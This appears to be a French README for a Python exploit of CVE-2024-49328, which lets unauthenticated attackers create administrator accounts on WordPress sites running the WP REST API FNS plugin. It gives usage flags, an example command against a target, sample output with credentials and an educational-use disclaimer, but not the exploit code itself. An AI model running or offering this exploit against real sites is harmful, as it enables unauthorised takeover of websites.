
Script Python permettant d'exploiter une vulnérabilité d'élévation de privilèges dans le plugin WordPress WP REST API FNS, permettant la création non authentifiée de comptes administrateur.
Ce script exploite une vulnérabilité d'élévation de privilèges dans le plugin WP REST API FNS pour WordPress. La vulnérabilité affecte toutes les versions jusqu'à 1.0.0 incluse, permettant à des attaquants non authentifiés d'obtenir les privilèges d'administrateur.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
Exemple de commande :
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 Avertissement :
Ce script est fourni à des fins éducatives uniquement. L'utilisation non autorisée de ce script contre des systèmes sans autorisation explicite est illégale et contraire à l'éthique.
| Étape | Description | Icon |
|---|
| Étape 1 | Vérifier la version du plugin. | 📝 |
| Étape 2 | Vérifier si la version est exploitable (1.0.0 ou inférieure). | ✅ |
| Étape 3 | Exploiter la vulnérabilité et enregistrer un nouvel utilisateur administrateur. | 🔒 |
| Étape 4 | Afficher le résultat avec les identifiants de l'utilisateur pour vérification. | 🎉 |